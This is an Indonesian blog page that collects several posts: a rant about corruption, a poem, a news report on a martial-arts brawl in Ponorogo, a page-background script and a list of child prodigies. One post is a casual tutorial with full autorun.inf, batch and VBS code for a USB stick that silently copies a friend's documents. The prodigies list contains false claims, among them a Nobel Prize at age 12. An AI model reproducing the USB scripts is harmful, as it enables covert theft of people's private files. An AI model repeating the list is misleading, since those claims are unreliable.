Mau Jadi Apa Negeri Kita Indonesia?

Trimuda Reog | 10.42 | 0 komentar
Mau  Jadi Apa Negeri Kita?

Benteng konstitusi Indonesia telah runtuh dan diambang kehancuran. Semua pejabat tidak lagi mengabdi  pada bangsa. Para wakil rakyat yang notabene-nya pesuruh rakyat dan suara rakyat malah jadi budak hawa nafsunya sendiri dan menjadi musuh rakyat yang nyata. Semua pejabat/ wakil rakyat yang menjadi tiang  negara telah terkikis dengan rayap-rayap (korupsi) semakin lama akan roboh. Indonesia akan jadi apa? Sedangkan tiangnya negara semakin lapuk tak terkendali?

Para pejabat semua terlibat dosa akasus suap menyuap dan korupsi. Ternyata kita harus akui bahwa visi dan misi SBY Presiden Republik Indonesia telah gagal menjalankan apa yang ia sampaikan yaitu memberantas habis korupsi, koruptor sampai akar-akarnya. Yang kecil-kecil tertangkap akan tetapi diwilayah pemerintah atas belum tersentuh sekali.

Semua partai politik yang koar-koar meneriakkan semboyannya yang akan membasmi korupsi Cuma dijadikan tameng dan senjata untuk menang dari partai politik yang lain, Itu saja tidak lebih. Semua potensi Negeri yang gemah ripah loh jinawi telah direnggut dan dinodai oleh pejabatnya sendiri.

Pejabat NKRI dari atas sampai kabupaten bahkan sampai pemerintah desa telah tercemar yang namanya korupsi. Rakyat Cuma dijadikan alat untuk memilihnya, dan akhirnya dia yang akan menghabiskan uang rakyat. Jabatan tidak untuk mengabdikan diri akan tetapi hanya mencari kepentingan pribadi. Rakya selalu dibebani pajak yang akhirnya menyenangkan perut-perut para pejabat yang tidak bertanggung jawab. Bersambung . . .














tags: pemerintahan kotor, bobrok, konstitusi runtuh, korupsi, pejabat, biadap, koruptor, berantas, penipuan, mahkamah, negara, indonesia, ternodai, uang rakyat, wakil, wakil rakyat, dpr, mpr, KPK, tangkap, bajingan, terlibat, tertangkap, presiden, negeri, dibunuh, milyaran, dana

Cara Mencuri Data Dengan Flashdisk (iseng)

Trimuda Reog | 14.45 | 1komentar

trik mencuri data
Cara Mencuri Data Dengan Flashdisk === Daripada nganggur gak ada kerjaan, pikiran jenuh, suntuk, bosen, males, semua jadi satu mending kita senang-senang. Ok begini saya akan memberikan tutorial sederhana tapi mantap, nah Flashdisk memang bisa di jadikan pencuri data yang seperti di film-film itu hehehe :D dan Lumayan Buat modal jadi mata-mata kayak James Bond :P OK kita ke TKP COY

Sebelumnya siapin dulu flashdisk kita (kalo bisa minimal 8 GB)




Langkah ke-1
Buka Notepad copy dan paste kode dibawah ini.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Kemudian simpanlah di flashdisk dengan nama: autorun.inf

Langkah ke-2
Buka Notepad lagi dan copas kode berikut:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all
\doc"
@echo off
cls

Simpan di flashdisk anda dengan nama:file.bat

Langkah ke-3
Buka Notepad lagi dan copas kode berikut:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0)
& """", 0, False
Simpan di flashdisk anda dengan nama:invisible.vbs

Langkah ke-4
Buka Notepad lagi dan copas lagi kode berikut:
wscript.exe \invisible.vbs file.bat
Simpan di flashdisk anda dengan nama:launch.bat

Ok, sekarang pastikan ke-4 file tadi yang telah kita buat berada di flashdisk kita, dan buatlah
folder baru dengan nama all untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah: %backupcmd% “%USERPROFILE%\My Documents\*.doc” “%drive%\all
\doc” , akan menyalin semua file ber-ekstensi .doc kedalam folder “all/doc” yang berada di flashdisk kita secara otomatis waktu kita mencolokkan flashdisk kita dikomputernya ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.

Sebelum mencoba mencuri file dikomputer teman, coba dulu flashdisk kita dikomputer kita sendiri, lihat apakah bekerja dengan baik. Selamat mencoba Semoga Berhasil ya.jangan terlalu iseng cooyyy






tags: trik mencuri data, trik, data, mencuri, flashdisk

Mimpi Dibalik Sore

Trimuda Reog | 14.33 | 0 komentar


puisi impianMentari perlahan, merubah rona menjadi kemerahan

 Tak lagi angkuh teriknya, tertata menawan angkasa

 Seolah terluput, gelisah kepak burung menuju pulang

 Ada kerinduannya, yang ia selipkan diantara ranting cemara




 Aku disini, berdiri, sendirian, tersenyum tanpa arti

 Jemari yang kuselipkan, tak kuat lagi menggapai anganku

 Masih seperti kemarin, kuhabiskan senja di bukit batu ini

 Hamparan didepanku, terlampau luas, tuk mengantar impianku


Aku ingin merubah mimpi, mimpi tentang mentari di hari esok

 Meski aku tahu, mimpi itu hanya akan lunas dengan rupiahku

 Namun aku hanya mampu menarik napas dalam, teramat dalam

 Masih adakah impian yang tersisa, diantara hamparan jerami didepanku?

Konflik Setelah Deklarasi Damai Pencak Silat Ponorogo

Trimuda Reog | 13.26 | 0 komentar

PONOROGO ~ Setelah mengajak seluruh perguruan pencak silat dan bela diri se- Kabupaten Ponorogo untuk duduk bersama dalam satu forum komunikasi, Polres Ponorogo melaksanakan deklarasi damai dan pengukuhan forum pencak silat dan bela diri yang ada diwilayah Ponorogo, Sabtu (28/9/2013) di stadion Bhatoro Katong, sekitar pukul 14.00 WIB.

Sebelum acara penanda tanganan deklarasi damai dan pengukuhan, terlebih dahulu diadakan upacara yang diikuti oleh Forpinda Kabupaten Ponorogo dan perwakilan dari semua perguruan 21 Kecamatan yang ada diwilayah Ponorogo. Ribuan warga pendekar pun memenuhi stadion Bhatoro Katong, Minggu sekitar pukul 14.00 WIB hingga sore

Dalam acara pengukuhan perdammaian tersebut menurut Wakapolres Ponorogo Kompol. Tri Saksono Puspoaji menjelaskan bahwa sekitar 3000 pendekar dari semua perguruan yang ada di Ponorogo berjanji satu tekad hanya untuk perdamaian.
“Sekitar 3000 pendekar seluruh Ponorogo dari semua perguruan berkumpul di satadion ini dan dijaga 1000 personil kemanan,” terangnya.

Kapolres Ponorogo AKB Iwan Kurniawan,S.I.K,Msi saat dikonfirmasi disela-sela acara mengatakan bahwa kegiatan ini merupakan salah satu upaya-upaya pencegahan yang dilakukan pihak Kepolisian. Dengan deklarasi damai dan pengukuhan ini diharapkan kejadian-kejadian, masalah-masalah yang terjadi antar perguruan dapat diminimalisir, bahkan menjadi nihil.
Ini merupakan wadah atau forum untuk mempererat komunikasi agar terjalin koordinasi, mengatasi permasalahan-permasalahan yang timbulkan oleh perguruan silat maupun bela diri,sehingga jika adasuatu maslah dapat diseleseikan,tidak dengan kekerasan atau anarkis yang dapat menimbulkan kerawanan maslah keamanan,ketertiban masyarakat.

Lebih Lanjut Mantan Kapolresta Mojokerto ini menambahkan, bahwa dengan penanda tanganan deklarasi damai dan pengkukuhkan forum komunikasi pencak silat dan bela diri yang dihadiri, diikuti dan disaksikan oleh anggota masing-masing perguruan membuat tidak adanya konflik di level bawah.
Sebab selama ini level bawah sangat rawan konflik. Dan diharapkan dari deklarasi dan pengukuhan ini untuk mengantisipasi masalah-masalah keamanan, ketertiban masyarakat, agar tercipta kondisi situasi yang aman, nyaman.

Terkait insiden tersebut polisi pun segera mengamankan para pelaku tawuran yang di duga telah memicu tawuran tersebut. Sebanyak 30 pemuda dari organisai pencak silat Setia Hati Winongo diamankan di Mapolres berserta 24 sepda motor. Mereka diminta keterangan dalam proses penyelidikan.
Kejadian itu dipicu karena saat Minggu petang tersebut rombongan dari wilayah Kecamatan Slahung hendak pulang dengan mengendari sepeda motor dari satdion, setibanya di selatan Jembatan Grenteng mereka di lempari oleh anak-anak yang bergerombol di tepian jalan raya Ponorogo-Pacitan tersebut.
Para pemuda yang membuat onar itu pun akhirnya di lucuti pakainnya oleh petugas sebelum dimasukan ke jeruji besi untuk pengamanan.

Wakapolres Ponorogo Kompol Trisaksono Puspoaji ketika dikonfirmasi saat mendampingi Kapolres Ponorogo AKBP Iwan Kurniawan menjelaskan, kalau ke semua pelaku yang di duga telah memicu tawuran antar perguruan tersebut sudah diamankan di mapolres beserta barang bukti sepda motor, HP dan baju yang dikenakannya.
“Mereka kita amankan beserta 24 sepeda motor dan 30 HP dan mereka akan kita mintai keterangan untuk penyelidikan,” ujar Kompol Trisaksono.



Tags: perguruan, pencak silat, deklarasi, damai, ponorogo, pengukuhan

Cara Buat Background Blog Ganti Saat Di Refresh

Trimuda Reog | 22.47 | 0 komentar
Puisi Dan Pendidikan, Background Blog Berubah Saat Refresh, anda ngerti kan maksud saya?, Background pada blog anda akan berubah warna kalau di refresh, gitu loh,,hehe.. Caranya sangat gampang, anda tidak perlu mengedit HTML, anda cukup meng-copy kode script dibawah ini ke elemen laman/Add Gadget pada blog anda.


<script type='text/javascript'> //CDATA[ /* JavaScript Kit (http://trimudareog.blogspot.com/)*/ //Created Ageboy: var bgcolorlist=new Array("#FFFFFF", "#B30000", "#EEFF00", "#11FF00", "#FF8A14", "#0008FF", "#4AFFF3", "#000") document.body.style.background=bgcolorlist[Math.floor(Math.random()*bgcolorlist.length)] //]]>
</script>

Silahkan anda ganti Tulisan URL yang berwarna merah dengan alamat blog anda. Setelah itu silahkan di simpan gedget anda, dan lihat hasilnya. Selamat mencoba semoga berhasil.





NB: Silahkan gonta ganti warna sesuai keinginan ente..........



10 Orang Ajaib Di Dunia

Trimuda Reog | 04.27 | 0 komentar

1. Kim Ung-Yong : Manusia Ber-IQ tertinggi di dunia

arsip-artikel-unik.blogspot.com - 10 Anak Paling Ajaib di Dunia

Lahir pada tahun 1962, Anak dari Korea ini dinobatkan sebagai manusia jenius di seluruh dunia. Bayangkan Pada umur 4 tahun, dia sudah bisa membaca huruf Jepang, Korea, Jerman, Inggris. Pada umur 5 tahun ia mampu memecahkan masalah pada soal kalkulus. ia mencatatkan dirinya pada Guinness Book of World Records dengan IQ tertinggi 2010.

2. Gregory Smith : Mendapatkan penghargaan Nobel pada usia 12

arsip-artikel-unik.blogspot.com - 10 Anak Paling Ajaib di Dunia

Lahir pada tahun 1990, Gregory Smith mencatatkan namanya pada nobel perdamaian berkat usahanya dalam mendirikan International Youth Advocates, Perkumpulan Orang muda seluruh dunia. Ia pernah bertemu langsung dengan Presiden Bush, dan juga Michael Gorbacev.

3. Akrit Jaswal : Dokter bedah usia 7 tahun

arsip-artikel-unik.blogspot.com - 10 Anak Paling Ajaib di Dunia

Julukan "anak terpandai di dunia" telah melekat pada Akrit Jaswal, seorang anak dari India. Ia mengejutkan publik ketika pada umur 7 tahun melakukan pembedahan pada seorang gadis lokal di tempatnya. Gadis itu menderita luka bakar di tangannya hingga tangannya tidak dapat dibuka, dan Jaswal pun melakukan pembedahan hingga jemari gadis itu bisa terbuka seperti sedia kala. Saat ini ia tercatat sebagai dokter paling muda di dunia. Ia diterima di Universitas pada usia 11 tahun.

4. Cleopatra Stratan : Bocah penyanyi berusia 3 tahun dengan gaji 1000€ per lagu

arsip-artikel-unik.blogspot.com - 10 Anak Paling Ajaib di Dunia

Lahir Pada 6 Oktober 2002 di Chisinau. Ia adalah pencatat sejarah di industri musik sebagai seorang penyanyi dengan albumnya tahun 2006 La vĂ¢rsta de trei ani, pada usia 3 tahun. Dia mencatat record seorang artis cilik yang tampil di atas panggung dengan ribuan penggemarnya. Dia juga menerima penghargaan MTV Award dalam artis termuda yang mencetak #1 Hit.

5. Aelita Andre : Pelukis di usia 2 tahun

arsip-artikel-unik.blogspot.com - 10 Anak Paling Ajaib di Dunia

Anak kelahiran Australia ini baru berumur dua tahun sudah menunjukkan kualitasnya sebagai jenius, ia memiliki sebuah gedung pertunjukkan untuk karya-karya abstraknya. Pada mulanya Mark Jamieson, direktur dari Brunswick Street Gallery di Melbourne's Fitzroy. Tertarik melihat sebuah foto lukisan dari Aelita Andre, dan dia menginginkannya bergabung dalam grupnya karena bakat lukisannya itu. Ketika undangan telah dibuat, ia baru saja menyadari bahwa Aelita adalah anak yang masih berumur 22 bulan. Namun ia tetap melanjutkan pertunjukannya itu.


6. Saul Aaron Kripke : Mengajar Havard saat masih duduk di bangku SMA

arsip-artikel-unik.blogspot.com - 10 Anak Paling Ajaib di Dunia

Lahir di New York dan tumbuh dewasa di Omaha tahun 1940. Jenius satu ini, saat kelas empat sudah menguasai aljabar, saat akhir SD ia sudah bisa geometri, kalkulus dan filsafat. Saat SMU ia memperoleh surat dari Harvard agar melamar sebagai dosen, namun ibunya menyuruhnya untuk menamatkan sekolahnya dahulu. Kripke dihadiahi Schock Prize, Nobel Filosofi. Sekarang ia dinobatkan sebagai ahli filsafat terbesar dalam sejarah.


7. Michael Kevin Keaulus : Kuliah pada umur 10 tahun

arsip-artikel-unik.blogspot.com - 10 Anak Paling Ajaib di Dunia

Kaerny, lahir tahun 1984, ia menyelesaikan kuliah pada umur 10 tahun dan tercatat sebagai sarjana termuda. Ia mengajar di universitas pada usia 17 tahun. Namanya semakin mencuat kala dia memenangkan sebuah kuis online. Pada 2006, dia mencapai final di tanda burnett/aol perebutan Gold Rush, permainan menguji/teka-teki, dan menjadi pemenang pertama 1 juta di permainan online.


8. Fabiano Luigi Caruana : Grandmaster pada usia 14

arsip-artikel-unik.blogspot.com - 10 Anak Paling Ajaib di Dunia

Seorang anak berwarga negara America dan Italia ini sungguh jenius. Pada tahun 2007 ia memperoleh Grandmasternya. Sejarah telah mencatat namanya dalam Grandmaster termuda. Dan baru-baru ini pada bulan April 2009, ia memperoleh Elo rating 2649, dalam usianya yang di bawah 18 tahun, membuatnya sebagai peraih ranking terbanyak. Hal itu dilakukannya sebelum usianya genap 18 tahun.


9. Willie Mosconi : Pemain bilyard professional pada usia 6 tahun

arsip-artikel-unik.blogspot.com - 10 Anak Paling Ajaib di Dunia

Mendapat julukan "Tuan Pocket Billiards". Dia berasal dari Philadelphia, Pennsylvania. Ayahnya seorang pemilik tempat billyard, namun ayahnya tidak mengizinkannya bermain. Ia sering berimprovisasi dengan gagang sapu milik ibunya. Ayahnya melihat bakat anaknya, ia sering mengalahkan orang-orang yang lebig tua darinya. Antara tahun 1941 dan 1957, dia memenagkan BCA World Championship selama 15 kali tanpa pernah kalah sekalipun. Ia membuat berbagai macam trik, membuat banyak rekor, dan membuat billyard menjadi olahraga yang terkenal.

10. Elaina Smith : Penyiar Usia 7 tahun

Dalam usianya yang 7 tahun, Elaina telah menjadi penyiar radio dengan pendengar yang jumlahnya melebihi umurnya. Elaina banyak memberikan solusi tentang percintaan kepada para pendengarnya. Bagaimana caranya memutuskan pacar dan bagaimana caranya untuk membina hubungan yang harmonis.

Daftar Kategori


close
cbox
 
Alamat: Talun | Ngebel | Ponorogo
Copyright © 2011. PUISI DAN PENDIDIKAN - All Rights Reserved
Template Modify by Cah Ngebel
Proudly powered by Blogger